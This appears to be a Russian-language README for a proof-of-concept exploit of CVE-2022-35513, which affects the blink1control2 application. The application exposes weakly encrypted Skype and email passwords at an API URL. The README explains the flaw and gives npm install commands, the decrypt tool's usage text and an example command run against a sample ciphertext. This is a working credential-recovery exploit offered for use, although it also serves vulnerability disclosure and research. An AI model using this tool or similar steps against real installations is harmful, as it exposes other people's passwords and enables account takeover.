
CVE-2022-35513 | blink1-pass-decrypt
poc и простой скрипт, предназначенные для расшифровки шифротекста, находящегося по адресу /blink/input
api-сервера в установках blink1control2 (версии <=2.2.7).
приложение blink1control2 использует слабое шифрование паролей и небезопасный метод хранения, которые можно обнаружить, обратившись к URL-адресу /blink1/input
api-сервера.
шифротекст паролей для логинов skype и email указан и может быть расшифрован.
sudo apt install npm
npm install argparse
npm install simplecrypt
используйте ./blink1-pass-decrypt или node blink1-pass-decrypt с -h или --help для вызова справки:
usage: blink-pass-decrypt [-h] ciphertext
decrypts passwords found at the /blink/input url of the blink1control2 api
server (version <= 2.2.7 ).
positional arguments:
ciphertext encrypted password string to use
optional arguments:
-h, --help show this help message and exit
пример:
node blink1-pass-decrypt '69827e0ecea378946e999df4313cb9a1e49c049a7b9bac8bf1105cdec9f221c8'